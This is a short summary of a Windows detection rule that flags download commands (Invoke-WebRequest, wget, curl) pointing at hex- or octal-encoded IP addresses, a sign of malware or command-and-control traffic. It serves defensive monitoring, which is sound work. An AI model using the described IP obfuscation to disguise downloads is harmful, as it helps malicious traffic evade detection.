
Summary
This detection rule is designed to identify instances where a process in the Windows environment is using an obfuscated or encoded IP address in a URL along with a download command. The rule specifically looks for command line invocations that include common download utilities such as 'Invoke-WebRequest', 'wget', or 'curl', combined with encoded variations of IP addresses (e.g., hexadecimal, octal). The key components of the detection involve multiple selections: one for detecting standard download commands, others to capture variations of encoded IPs in the command line, and a filter that distinguishes valid IP address formats to minimize false positives. The rule's condition necessitates that at least one encoded IP matching the specifications is identified, while a valid IP format does not match. This method ensures identification of potentially malicious activities that use obfuscated IP addresses to disguise download behavior, which is often a sign of malware or external command and control (C2) communications.
Categories
- Windows
- Endpoint
Data Sources
- Process
Created: 2022-08-03